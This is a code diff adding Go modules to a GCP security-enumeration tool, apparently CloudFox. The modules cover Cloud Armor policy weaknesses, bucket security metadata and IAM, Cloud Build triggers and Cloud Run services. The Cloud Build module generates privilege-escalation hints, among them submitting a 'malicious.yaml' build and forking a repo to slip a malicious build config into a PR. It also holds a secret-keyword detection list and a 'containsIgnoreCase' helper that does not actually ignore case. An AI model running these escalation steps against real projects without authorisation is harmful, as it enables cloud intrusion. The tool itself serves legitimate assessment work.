findAttachedResources finds backend services using this security policy +func (s *CloudArmorService) findAttachedResources(ctx context.Context, service *compute.Service, projectID, policyName string) []string { + var resources []string + + // Check backend services + backendServices, err := service.BackendServices.List(projectID).Context(ctx).Do() + if err == nil { + for _, bs := range backendServices.Items { + if bs.SecurityPolicy != "" && strings.HasSuffix(bs.SecurityPolicy, "/"+policyName) { + resources = append(resources, fmt.Sprintf("backend-service:%s", bs.Name)) + } + } + } + + return resources +} + +// analyzePolicy checks for security weaknesses in the policy +func (s *CloudArmorService) analyzePolicy(policy SecurityPolicy) []string { + var weaknesses []string + + // Check if policy is attached to anything + if len(policy.AttachedResources) == 0 { + weaknesses = append(weaknesses, "Policy not attached to any backend service") + } + + // Check for overly permissive rules + hasDefaultAllow := false + hasDenyRules := false + previewOnlyCount := 0 + allowAllIPsCount := 0 + + for _, rule := range policy.Rules { + if rule.Priority == 2147483647 && rule.Action == "allow" { + hasDefaultAllow = true + } + if strings.HasPrefix(rule.Action, "deny") { + hasDenyRules = true + } + if rule.Preview { + previewOnlyCount++ + } + // Check for allow rules that match all IPs + if rule.Action == "allow" && (rule.Match == "*" || rule.Match == "srcIpRanges: *" || + strings.Contains(rule.Match, "0.0.0.0/0") || rule.Match == "true") { + allowAllIPsCount++ + } + } + + if hasDefaultAllow && !hasDenyRules { + weaknesses = append(weaknesses, "Default allow rule with no deny rules") + } + + if previewOnlyCount > 0 { + weaknesses = append(weaknesses, fmt.Sprintf("%d rule(s) in preview mode", previewOnlyCount)) + } + + if allowAllIPsCount > 0 && !hasDenyRules { + weaknesses = append(weaknesses, "Has allow-all rules without deny rules") + } + + // Check adaptive protection + if 
!policy.AdaptiveProtection { + weaknesses = append(weaknesses, "Adaptive protection not enabled") + } + + // Check for common WAF rules + hasOWASPRules := false + for _, rule := range policy.Rules { + matchLower := strings.ToLower(rule.Match) + if strings.Contains(matchLower, "sqli") || strings.Contains(matchLower, "xss") || + strings.Contains(matchLower, "rce") || strings.Contains(matchLower, "lfi") { + hasOWASPRules = true + break + } + } + + if !hasOWASPRules { + weaknesses = append(weaknesses, "No OWASP/WAF rules detected") + } + + return weaknesses +} + +// GetUnprotectedLoadBalancers finds load balancers without Cloud Armor protection +func (s *CloudArmorService) GetUnprotectedLoadBalancers(projectID string) ([]string, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var unprotected []string + + // Get all backend services + backendServices, err := service.BackendServices.List(projectID).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, bs := range backendServices.Items { + if bs.SecurityPolicy == "" { + unprotected = append(unprotected, bs.Name) + } + } + + return unprotected, nil +} diff --git a/gcp/services/cloudStorageService/cloudStorageService.go b/gcp/services/cloudStorageService/cloudStorageService.go index c91f071a..e62fa8df 100644 --- a/gcp/services/cloudStorageService/cloudStorageService.go +++ b/gcp/services/cloudStorageService/cloudStorageService.go @@ -3,38 +3,117 @@ package cloudstorageservice import ( "context" "fmt" + "strings" + "time" + "cloud.google.com/go/iam" "cloud.google.com/go/storage" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "google.golang.org/api/iterator" + "google.golang.org/api/option" + storageapi "google.golang.org/api/storage/v1" ) type CloudStorageService struct { - // DataStoreService datastoreservice.DataStoreService + client *storage.Client + session 
*gcpinternal.SafeSession } +// New creates a new CloudStorageService (legacy - uses ADC directly) func New() *CloudStorageService { return &CloudStorageService{} } -// type ObjectInfo struct { -// ObjectName string `json:"objecttName"` -// ObjectSizeBytes float64 `json:"objectSizeBytes"` -// IsPublic bool `json:"isPublic"` -// } +// NewWithSession creates a CloudStorageService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *CloudStorageService { + return &CloudStorageService{session: session} +} + +// NewWithClient creates a CloudStorageService with an existing client (for reuse) +func NewWithClient(client *storage.Client) *CloudStorageService { + return &CloudStorageService{client: client} +} + +// IAMBinding represents a single IAM binding on a bucket +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// LifecycleRule represents a single lifecycle rule on a bucket +type LifecycleRule struct { + Action string `json:"action"` // Delete, SetStorageClass, AbortIncompleteMultipartUpload + StorageClass string `json:"storageClass"` // Target storage class (for SetStorageClass) + AgeDays int64 `json:"ageDays"` // Age condition in days + NumVersions int64 `json:"numVersions"` // Number of newer versions condition + IsLive *bool `json:"isLive"` // Whether object is live (vs archived) + MatchesPrefix string `json:"matchesPrefix"` // Object name prefix match + MatchesSuffix string `json:"matchesSuffix"` // Object name suffix match + MatchesStorage string `json:"matchesStorage"` // Storage class match + CreatedBefore string `json:"createdBefore"` // Created before date condition + DaysSinceCustom int64 `json:"daysSinceCustom"` // Days since custom time + DaysSinceNoncurrent int64 `json:"daysSinceNoncurrent"` // Days since became noncurrent +} +// BucketInfo contains bucket metadata and security-relevant configuration type BucketInfo struct { + // Basic info Name string 
`json:"name"` Location string `json:"location"` ProjectID string `json:"projectID"` + + // Security-relevant fields + PublicAccessPrevention string `json:"publicAccessPrevention"` // "enforced", "inherited", or "unspecified" + UniformBucketLevelAccess bool `json:"uniformBucketLevelAccess"` // true = IAM only, no ACLs + VersioningEnabled bool `json:"versioningEnabled"` // Object versioning + RequesterPays bool `json:"requesterPays"` // Requester pays enabled + DefaultEventBasedHold bool `json:"defaultEventBasedHold"` // Event-based hold on new objects + LoggingEnabled bool `json:"loggingEnabled"` // Access logging enabled + LogBucket string `json:"logBucket"` // Destination bucket for logs + EncryptionType string `json:"encryptionType"` // "Google-managed", "CMEK", or "CSEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + RetentionPolicyEnabled bool `json:"retentionPolicyEnabled"` // Retention policy set + RetentionPeriodDays int64 `json:"retentionPeriodDays"` // Retention period in days + RetentionPolicyLocked bool `json:"retentionPolicyLocked"` // Retention policy is locked (immutable) + SoftDeleteEnabled bool `json:"softDeleteEnabled"` // Soft delete policy enabled + SoftDeleteRetentionDays int64 `json:"softDeleteRetentionDays"` // Soft delete retention in days + StorageClass string `json:"storageClass"` // Default storage class + AutoclassEnabled bool `json:"autoclassEnabled"` // Autoclass feature enabled + AutoclassTerminalClass string `json:"autoclassTerminalClass"` // Terminal storage class for autoclass + + // Lifecycle configuration + LifecycleEnabled bool `json:"lifecycleEnabled"` // Has lifecycle rules + LifecycleRuleCount int `json:"lifecycleRuleCount"` // Number of lifecycle rules + LifecycleRules []LifecycleRule `json:"lifecycleRules"` // Parsed lifecycle rules + HasDeleteRule bool `json:"hasDeleteRule"` // Has a delete action rule + HasArchiveRule bool `json:"hasArchiveRule"` // Has a storage class transition rule + ShortestDeleteDays 
int64 `json:"shortestDeleteDays"` // Shortest delete age in days + TurboReplication bool `json:"turboReplication"` // Turbo replication enabled (dual-region) + LocationType string `json:"locationType"` // "region", "dual-region", or "multi-region" + + // Public access indicators + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings"` // IAM policy bindings on the bucket + + // Timestamps + Created string `json:"created"` + Updated string `json:"updated"` } func (cs *CloudStorageService) Buckets(projectID string) ([]BucketInfo, error) { ctx := context.Background() - client, err := storage.NewClient(ctx) + + // Get or create client + client, closeClient, err := cs.getClient(ctx) if err != nil { - return nil, fmt.Errorf("Failed to create client: %v", err) + return nil, err + } + if closeClient { + defer client.Close() } - defer client.Close() var buckets []BucketInfo bucketIterator := client.Buckets(ctx, projectID) @@ -46,72 +125,313 @@ func (cs *CloudStorageService) Buckets(projectID string) ([]BucketInfo, error) { if err != nil { return nil, err } - bucket := BucketInfo{Name: battrs.Name, Location: battrs.Location, ProjectID: projectID} + + bucket := BucketInfo{ + Name: battrs.Name, + Location: battrs.Location, + ProjectID: projectID, + } + + // Security fields + bucket.PublicAccessPrevention = publicAccessPreventionToString(battrs.PublicAccessPrevention) + bucket.UniformBucketLevelAccess = battrs.UniformBucketLevelAccess.Enabled + bucket.VersioningEnabled = battrs.VersioningEnabled + bucket.RequesterPays = battrs.RequesterPays + bucket.DefaultEventBasedHold = battrs.DefaultEventBasedHold + bucket.StorageClass = battrs.StorageClass + + // Logging + if battrs.Logging != nil { + bucket.LoggingEnabled = battrs.Logging.LogBucket != "" + bucket.LogBucket = battrs.Logging.LogBucket + } + 
+ // Encryption + if battrs.Encryption != nil && battrs.Encryption.DefaultKMSKeyName != "" { + bucket.EncryptionType = "CMEK" + bucket.KMSKeyName = battrs.Encryption.DefaultKMSKeyName + } else { + bucket.EncryptionType = "Google-managed" + } + + // Retention Policy + if battrs.RetentionPolicy != nil { + bucket.RetentionPolicyEnabled = true + bucket.RetentionPeriodDays = int64(battrs.RetentionPolicy.RetentionPeriod.Hours() / 24) + bucket.RetentionPolicyLocked = battrs.RetentionPolicy.IsLocked + } + + // Autoclass + if battrs.Autoclass != nil && battrs.Autoclass.Enabled { + bucket.AutoclassEnabled = true + bucket.AutoclassTerminalClass = battrs.Autoclass.TerminalStorageClass + } + + // Timestamps + if !battrs.Created.IsZero() { + bucket.Created = battrs.Created.Format("2006-01-02") + } + + // Get additional fields via REST API (SoftDeletePolicy, Updated) + cs.enrichBucketFromRestAPI(ctx, &bucket) + + // Get IAM policy for the bucket + iamBindings, isPublic, publicAccess := cs.getBucketIAMPolicy(ctx, client, battrs.Name) + bucket.IAMBindings = iamBindings + bucket.IsPublic = isPublic + bucket.PublicAccess = publicAccess + buckets = append(buckets, bucket) } return buckets, nil } -// func (cs *CloudStorageService) BucketsWithMetaData(projectID string) (map[string][]BucketInfo, error) { -// buckets, _ := cs.Buckets(projectID) -// bucketInfos := make(map[string][]BucketInfo) -// ctx := context.Background() -// client, err := storage.NewClient(ctx) -// if err != nil { -// return nil, fmt.Errorf("Failed to create client: %v", err) -// } -// for { -// bucketAttrs, err := buckets.Next() -// if err == iterator.Done { -// break -// } -// if err != nil { -// return nil, fmt.Errorf("failed to list buckets: %v", err) -// } - -// bucketName := bucketAttrs.Name -// log.Printf("Working on bucket %s", bucketName) - -// // List all objects in the bucket and calculate total size -// totalSize := int64(0) -// var objects []ObjectInfo -// it := client.Bucket(bucketName).Objects(ctx, nil) 
-// for { -// objectAttrs, err := it.Next() -// if err == iterator.Done { -// break -// } -// if err != nil { -// return nil, fmt.Errorf("failed to list objects in bucket %s: %v", bucketName, err) -// } - -// // Get size -// objectSize := objectAttrs.Size -// totalSize += objectSize - -// // Check if public -// isPublic := false -// for _, rule := range objectAttrs.ACL { -// if rule.Entity == storage.AllUsers { -// isPublic = true -// break -// } -// } - -// objects = append(objects, ObjectInfo{ObjectName: objectAttrs.Name, ObjectSizeBytes: float64(objectSize), IsPublic: isPublic}) - -// if totalSize > 3221225472 { // 3 GiB in bytes -// log.Printf("%s bucket is over 3 GiB. Skipping remaining objects in this bucket...", bucketName) -// break -// } -// } -// bucketSizeMB := float64(totalSize) / 1024 / 1024 -// bucketInfos[projectID] = append(bucketInfos[projectID], BucketInfo{BucketName: bucketName, BucketSizeMB: bucketSizeMB, Objects: objects}) -// } -// log.Printf("Sorting resulting list of buckets in descending order %s", projectID) -// sort.Slice(bucketInfos[projectID], func(i, j int) bool { -// return bucketInfos[projectID][i].BucketSizeMB > bucketInfos[projectID][j].BucketSizeMB -// }) - -// return bucketInfos, nil -// } +// getClient returns a storage client, using session if available +// Returns the client, whether to close it, and any error +func (cs *CloudStorageService) getClient(ctx context.Context) (*storage.Client, bool, error) { + // If we have an existing client, use it + if cs.client != nil { + return cs.client, false, nil + } + + // If we have a session, use its token source + if cs.session != nil { + client, err := storage.NewClient(ctx, cs.session.GetClientOption()) + if err != nil { + return nil, false, fmt.Errorf("failed to create client with session: %v", err) + } + return client, true, nil + } + + // Fall back to ADC + client, err := storage.NewClient(ctx) + if err != nil { + return nil, false, fmt.Errorf("failed to create client: %v", err) + 
} + return client, true, nil +} + +// getClientOption returns the appropriate client option based on session +func (cs *CloudStorageService) getClientOption() option.ClientOption { + if cs.session != nil { + return cs.session.GetClientOption() + } + return nil +} + +// getBucketIAMPolicy retrieves the IAM policy for a bucket and checks for public access +func (cs *CloudStorageService) getBucketIAMPolicy(ctx context.Context, client *storage.Client, bucketName string) ([]IAMBinding, bool, string) { + var bindings []IAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + policy, err := client.Bucket(bucketName).IAM().Policy(ctx) + if err != nil { + // Return empty bindings if we can't get the policy (permission denied, etc.) + return bindings, false, "Unknown" + } + + // Convert IAM policy to our binding format + for _, role := range policy.Roles() { + members := policy.Members(role) + if len(members) > 0 { + binding := IAMBinding{ + Role: string(role), + Members: make([]string, len(members)), + } + for i, member := range members { + binding.Members[i] = member + + // Check for public access + if member == string(iam.AllUsers) { + hasAllUsers = true + isPublic = true + } + if member == string(iam.AllAuthenticatedUsers) { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + bindings = append(bindings, binding) + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + +// GetBucketIAMPolicyOnly retrieves just the IAM policy for a specific bucket +func (cs *CloudStorageService) GetBucketIAMPolicyOnly(bucketName string) ([]IAMBinding, error) { + ctx := context.Background() + + client, closeClient, err := cs.getClient(ctx) + if err != 
nil { + return nil, err + } + if closeClient { + defer client.Close() + } + + bindings, _, _ := cs.getBucketIAMPolicy(ctx, client, bucketName) + return bindings, nil +} + +// publicAccessPreventionToString converts the PublicAccessPrevention type to a readable string +func publicAccessPreventionToString(pap storage.PublicAccessPrevention) string { + switch pap { + case storage.PublicAccessPreventionEnforced: + return "enforced" + case storage.PublicAccessPreventionInherited: + return "inherited" + default: + return "unspecified" + } +} + +// FormatIAMBindings formats IAM bindings for display +func FormatIAMBindings(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "No IAM bindings" + } + + var parts []string + for _, binding := range bindings { + memberStr := strings.Join(binding.Members, ", ") + parts = append(parts, fmt.Sprintf("%s: [%s]", binding.Role, memberStr)) + } + return strings.Join(parts, "; ") +} + +// FormatIAMBindingsShort formats IAM bindings in a shorter format for table display +func FormatIAMBindingsShort(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "-" + } + return fmt.Sprintf("%d binding(s)", len(bindings)) +} + +// enrichBucketFromRestAPI fetches additional bucket fields via the REST API +// that may not be available in the Go SDK version +func (cs *CloudStorageService) enrichBucketFromRestAPI(ctx context.Context, bucket *BucketInfo) { + var service *storageapi.Service + var err error + + // Use session if available + if cs.session != nil { + service, err = storageapi.NewService(ctx, cs.session.GetClientOption()) + } else { + service, err = storageapi.NewService(ctx) + } + + if err != nil { + // Silently fail - these are optional enrichments + return + } + + // Get bucket details via REST API + restBucket, err := service.Buckets.Get(bucket.Name).Context(ctx).Do() + if err != nil { + // Silently fail - these are optional enrichments + return + } + + // Parse SoftDeletePolicy + if restBucket.SoftDeletePolicy 
!= nil { + if restBucket.SoftDeletePolicy.RetentionDurationSeconds > 0 { + bucket.SoftDeleteEnabled = true + bucket.SoftDeleteRetentionDays = restBucket.SoftDeletePolicy.RetentionDurationSeconds / 86400 // seconds to days + } + } + + // Parse Updated timestamp + if restBucket.Updated != "" { + // REST API returns RFC3339 format + if t, err := time.Parse(time.RFC3339, restBucket.Updated); err == nil { + bucket.Updated = t.Format("2006-01-02") + } + } + + // Parse location type + bucket.LocationType = restBucket.LocationType + + // Parse Turbo Replication (for dual-region buckets) + if restBucket.Rpo == "ASYNC_TURBO" { + bucket.TurboReplication = true + } + + // Parse Lifecycle rules + if restBucket.Lifecycle != nil && len(restBucket.Lifecycle.Rule) > 0 { + bucket.LifecycleEnabled = true + bucket.LifecycleRuleCount = len(restBucket.Lifecycle.Rule) + bucket.ShortestDeleteDays = -1 // Initialize to -1 to indicate not set + + for _, rule := range restBucket.Lifecycle.Rule { + lcRule := LifecycleRule{} + + // Parse action + if rule.Action != nil { + lcRule.Action = rule.Action.Type + lcRule.StorageClass = rule.Action.StorageClass + + if rule.Action.Type == "Delete" { + bucket.HasDeleteRule = true + } else if rule.Action.Type == "SetStorageClass" { + bucket.HasArchiveRule = true + } + } + + // Parse conditions + if rule.Condition != nil { + // Age is a pointer to int64 + if rule.Condition.Age != nil && *rule.Condition.Age > 0 { + lcRule.AgeDays = *rule.Condition.Age + // Track shortest delete age + if lcRule.Action == "Delete" && (bucket.ShortestDeleteDays == -1 || *rule.Condition.Age < bucket.ShortestDeleteDays) { + bucket.ShortestDeleteDays = *rule.Condition.Age + } + } + if rule.Condition.NumNewerVersions > 0 { + lcRule.NumVersions = rule.Condition.NumNewerVersions + } + if rule.Condition.IsLive != nil { + lcRule.IsLive = rule.Condition.IsLive + } + if len(rule.Condition.MatchesPrefix) > 0 { + lcRule.MatchesPrefix = strings.Join(rule.Condition.MatchesPrefix, ",") + } + 
if len(rule.Condition.MatchesSuffix) > 0 { + lcRule.MatchesSuffix = strings.Join(rule.Condition.MatchesSuffix, ",") + } + if len(rule.Condition.MatchesStorageClass) > 0 { + lcRule.MatchesStorage = strings.Join(rule.Condition.MatchesStorageClass, ",") + } + if rule.Condition.CreatedBefore != "" { + lcRule.CreatedBefore = rule.Condition.CreatedBefore + } + if rule.Condition.DaysSinceCustomTime > 0 { + lcRule.DaysSinceCustom = rule.Condition.DaysSinceCustomTime + } + if rule.Condition.DaysSinceNoncurrentTime > 0 { + lcRule.DaysSinceNoncurrent = rule.Condition.DaysSinceNoncurrentTime + } + } + + bucket.LifecycleRules = append(bucket.LifecycleRules, lcRule) + } + + // If no delete rule, reset to 0 + if bucket.ShortestDeleteDays == -1 { + bucket.ShortestDeleteDays = 0 + } + } +} diff --git a/gcp/services/cloudbuildService/cloudbuildService.go b/gcp/services/cloudbuildService/cloudbuildService.go new file mode 100644 index 00000000..784357b0 --- /dev/null +++ b/gcp/services/cloudbuildService/cloudbuildService.go @@ -0,0 +1,361 @@ +package cloudbuildservice + +import ( + "context" + "fmt" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + cloudbuild "google.golang.org/api/cloudbuild/v1" +) + +type CloudBuildService struct { + session *gcpinternal.SafeSession +} + +// New creates a new CloudBuildService +func New() *CloudBuildService { + return &CloudBuildService{} +} + +// NewWithSession creates a CloudBuildService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *CloudBuildService { + return &CloudBuildService{session: session} +} + +// TriggerInfo represents a Cloud Build trigger +type TriggerInfo struct { + ID string `json:"id"` + Name string `json:"name"` + Description string `json:"description"` + ProjectID string `json:"projectId"` + Disabled bool `json:"disabled"` + CreateTime string `json:"createTime"` + + // Source configuration + SourceType string `json:"sourceType"` // github, cloud_source_repos, 
etc. + RepoName string `json:"repoName"` + BranchName string `json:"branchName"` + TagName string `json:"tagName"` + + // Build configuration + BuildConfigType string `json:"buildConfigType"` // yaml, dockerfile, inline + Filename string `json:"filename"` // cloudbuild.yaml path + ServiceAccount string `json:"serviceAccount"` // SA used for builds + Substitutions map[string]string `json:"substitutions"` + + // Security analysis + IsPublicRepo bool `json:"isPublicRepo"` + HasSecrets bool `json:"hasSecrets"` + PrivescPotential bool `json:"privescPotential"` +} + +// BuildInfo represents a Cloud Build execution +type BuildInfo struct { + ID string `json:"id"` + ProjectID string `json:"projectId"` + Status string `json:"status"` + CreateTime string `json:"createTime"` + StartTime string `json:"startTime"` + FinishTime string `json:"finishTime"` + TriggerID string `json:"triggerId"` + Source string `json:"source"` + ServiceAccount string `json:"serviceAccount"` + LogsBucket string `json:"logsBucket"` + Images []string `json:"images"` + // Pentest-specific fields + BuildSteps []BuildStep `json:"buildSteps"` + SecretEnvVars []string `json:"secretEnvVars"` + Artifacts []string `json:"artifacts"` +} + +// BuildStep represents a single step in a Cloud Build +type BuildStep struct { + Name string `json:"name"` // Container image + Args []string `json:"args"` // Command arguments + Entrypoint string `json:"entrypoint"` // Custom entrypoint + Env []string `json:"env"` // Environment variables + SecretEnv []string `json:"secretEnv"` // Secret environment variables + Volumes []string `json:"volumes"` // Mounted volumes +} + +// TriggerSecurityAnalysis contains detailed security analysis +type TriggerSecurityAnalysis struct { + TriggerName string `json:"triggerName"` + ProjectID string `json:"projectId"` + ServiceAccount string `json:"serviceAccount"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string 
`json:"exploitCommands"` + PrivescPotential bool `json:"privescPotential"` +} + +// ListTriggers retrieves all Cloud Build triggers in a project +func (s *CloudBuildService) ListTriggers(projectID string) ([]TriggerInfo, error) { + ctx := context.Background() + var service *cloudbuild.Service + var err error + + if s.session != nil { + service, err = cloudbuild.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = cloudbuild.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + + var triggers []TriggerInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Triggers.List(parent) + err = req.Pages(ctx, func(page *cloudbuild.ListBuildTriggersResponse) error { + for _, trigger := range page.Triggers { + info := s.parseTrigger(trigger, projectID) + triggers = append(triggers, info) + } + return nil + }) + if err != nil { + // Try with just project ID (older API) + req2 := service.Projects.Triggers.List(projectID) + err2 := req2.Pages(ctx, func(page *cloudbuild.ListBuildTriggersResponse) error { + for _, trigger := range page.Triggers { + info := s.parseTrigger(trigger, projectID) + triggers = append(triggers, info) + } + return nil + }) + if err2 != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + } + + return triggers, nil +} + +// ListBuilds retrieves recent Cloud Build executions +func (s *CloudBuildService) ListBuilds(projectID string, limit int64) ([]BuildInfo, error) { + ctx := context.Background() + var service *cloudbuild.Service + var err error + + if s.session != nil { + service, err = cloudbuild.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = cloudbuild.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + + var builds []BuildInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + 
req := service.Projects.Locations.Builds.List(parent).PageSize(limit) + resp, err := req.Do() + if err != nil { + // Try with just project ID + req2 := service.Projects.Builds.List(projectID).PageSize(limit) + resp, err = req2.Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + } + + for _, build := range resp.Builds { + info := BuildInfo{ + ID: build.Id, + ProjectID: projectID, + Status: build.Status, + CreateTime: build.CreateTime, + StartTime: build.StartTime, + FinishTime: build.FinishTime, + ServiceAccount: build.ServiceAccount, + LogsBucket: build.LogsBucket, + Images: build.Images, + } + if build.BuildTriggerId != "" { + info.TriggerID = build.BuildTriggerId + } + if build.Source != nil && build.Source.RepoSource != nil { + info.Source = build.Source.RepoSource.RepoName + } + + // Parse build steps for pentest analysis + for _, step := range build.Steps { + if step == nil { + continue + } + bs := BuildStep{ + Name: step.Name, + Args: step.Args, + Entrypoint: step.Entrypoint, + Env: step.Env, + SecretEnv: step.SecretEnv, + } + for _, vol := range step.Volumes { + if vol != nil { + bs.Volumes = append(bs.Volumes, vol.Name+":"+vol.Path) + } + } + info.BuildSteps = append(info.BuildSteps, bs) + info.SecretEnvVars = append(info.SecretEnvVars, step.SecretEnv...) 
+ } + + // Parse artifacts + if build.Artifacts != nil { + info.Artifacts = build.Artifacts.Images + } + + builds = append(builds, info) + } + + return builds, nil +} + +// AnalyzeTriggerForPrivesc performs detailed privesc analysis on a trigger +func (s *CloudBuildService) AnalyzeTriggerForPrivesc(trigger TriggerInfo, projectID string) TriggerSecurityAnalysis { + analysis := TriggerSecurityAnalysis{ + TriggerName: trigger.Name, + ProjectID: projectID, + ServiceAccount: trigger.ServiceAccount, + RiskReasons: []string{}, + } + + score := 0 + + // Check service account privileges + if trigger.ServiceAccount == "" { + analysis.RiskReasons = append(analysis.RiskReasons, + "Uses default Cloud Build SA (often has broad permissions)") + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Default SA often has: storage.admin, source.admin, artifactregistry.admin\n"+ + "gcloud builds submit --config=malicious.yaml --project=%s", projectID)) + score += 2 + analysis.PrivescPotential = true + } else { + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Build runs as: %s\n"+ + "# Check SA permissions:\n"+ + "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'", + trigger.ServiceAccount, projectID, trigger.ServiceAccount)) + } + + // GitHub PR triggers are exploitable + if trigger.SourceType == "github" && trigger.BranchName != "" { + analysis.RiskReasons = append(analysis.RiskReasons, + "GitHub trigger may execute code from pull requests") + analysis.ExploitCommands = append(analysis.ExploitCommands, + "# Fork repo, submit PR with malicious cloudbuild.yaml to trigger build") + score += 2 + } + + // Inline build configs might leak secrets + if trigger.BuildConfigType == "inline" { + analysis.RiskReasons = append(analysis.RiskReasons, + "Inline build config may contain hardcoded secrets or commands") + score += 1 + } + + // Secrets in substitutions + if trigger.HasSecrets { + 
analysis.RiskReasons = append(analysis.RiskReasons, + "Trigger uses substitution variables that may contain secrets") + score += 1 + } + + // Add exploitation guidance + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Trigger a build manually:\n"+ + "gcloud builds triggers run %s --project=%s --branch=%s", + trigger.ID, projectID, trigger.BranchName)) + + if score >= 3 { + analysis.RiskLevel = "HIGH" + } else if score >= 2 { + analysis.RiskLevel = "MEDIUM" + } else { + analysis.RiskLevel = "LOW" + } + + return analysis +} + +// parseTrigger converts a trigger to TriggerInfo +func (s *CloudBuildService) parseTrigger(trigger *cloudbuild.BuildTrigger, projectID string) TriggerInfo { + info := TriggerInfo{ + ID: trigger.Id, + Name: trigger.Name, + Description: trigger.Description, + ProjectID: projectID, + Disabled: trigger.Disabled, + CreateTime: trigger.CreateTime, + Substitutions: trigger.Substitutions, + } + + // Parse source configuration + if trigger.Github != nil { + info.SourceType = "github" + info.RepoName = fmt.Sprintf("%s/%s", trigger.Github.Owner, trigger.Github.Name) + if trigger.Github.Push != nil { + info.BranchName = trigger.Github.Push.Branch + info.TagName = trigger.Github.Push.Tag + } + if trigger.Github.PullRequest != nil { + info.BranchName = trigger.Github.PullRequest.Branch + } + } else if trigger.TriggerTemplate != nil { + info.SourceType = "cloud_source_repos" + info.RepoName = trigger.TriggerTemplate.RepoName + info.BranchName = trigger.TriggerTemplate.BranchName + info.TagName = trigger.TriggerTemplate.TagName + } + + // Parse build configuration + if trigger.Filename != "" { + info.BuildConfigType = "yaml" + info.Filename = trigger.Filename + } else if trigger.Build != nil { + info.BuildConfigType = "inline" + } + + // Service account + if trigger.ServiceAccount != "" { + info.ServiceAccount = trigger.ServiceAccount + } + + // Check for secrets in substitutions + for key := range trigger.Substitutions { + if 
containsSecretKeyword(key) { + info.HasSecrets = true + break + } + } + + // Determine privesc potential + // Default SA is often over-privileged, GitHub triggers can execute untrusted code + if info.ServiceAccount == "" { + info.PrivescPotential = true + } + if info.SourceType == "github" && info.BranchName != "" { + info.PrivescPotential = true + } + + return info +} + +// containsSecretKeyword checks if a key might contain secrets +func containsSecretKeyword(key string) bool { + secretKeywords := []string{"SECRET", "PASSWORD", "TOKEN", "KEY", "CREDENTIAL", "AUTH"} + for _, keyword := range secretKeywords { + if containsIgnoreCase(key, keyword) { + return true + } + } + return false +} + +func containsIgnoreCase(s, substr string) bool { + return len(s) >= len(substr) && (s == substr || + len(s) > len(substr) && (s[:len(substr)] == substr || s[len(s)-len(substr):] == substr)) +} diff --git a/gcp/services/cloudrunService/cloudrunService.go b/gcp/services/cloudrunService/cloudrunService.go new file mode 100644 index 00000000..068e9cef --- /dev/null +++ b/gcp/services/cloudrunService/cloudrunService.go @@ -0,0 +1,549 @@ +package cloudrunservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + run "google.golang.org/api/run/v2" +) + +type CloudRunService struct{} + +func New() *CloudRunService { + return &CloudRunService{} +} + +// ServiceInfo holds Cloud Run service details with security-relevant information +type ServiceInfo struct { + // Basic info + Name string + ProjectID string + Region string + Description string + Creator string + UpdateTime string + + // URL and traffic + URL string + LatestRevision string + LatestReadyRevision string + TrafficAllOnLatest bool + + // Security-relevant configuration + ServiceAccount string + IngressSettings string // INGRESS_TRAFFIC_ALL, INGRESS_TRAFFIC_INTERNAL_ONLY, INGRESS_TRAFFIC_INTERNAL_LOAD_BALANCER + VPCAccess string // VPC Connector or Direct VPC + 
VPCEgressSettings string // ALL_TRAFFIC, PRIVATE_RANGES_ONLY + BinaryAuthorizationPolicy string + + // Container configuration + ContainerImage string + ContainerPort int64 + CPULimit string + MemoryLimit string + MaxInstances int64 + MinInstances int64 + Timeout string + + // Environment variables (counts, not values) + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // Security analysis + HardcodedSecrets []HardcodedSecret // Potential secrets in env vars (not using Secret Manager) + UsesDefaultSA bool // Uses default compute service account + + // Detailed env var and secret info + EnvVars []EnvVarInfo // All environment variables + SecretRefs []SecretRefInfo // All Secret Manager references + + // IAM + InvokerMembers []string + IsPublic bool +} + +// HardcodedSecret represents a potential secret found in environment variables +type HardcodedSecret struct { + EnvVarName string + SecretType string // password, api-key, token, credential, connection-string +} + +// EnvVarInfo represents an environment variable configuration +type EnvVarInfo struct { + Name string + Value string // Direct value (may be empty if using secret ref) + Source string // "direct", "secret-manager", or "config-map" + // For Secret Manager references + SecretName string + SecretVersion string +} + +// SecretRefInfo represents a Secret 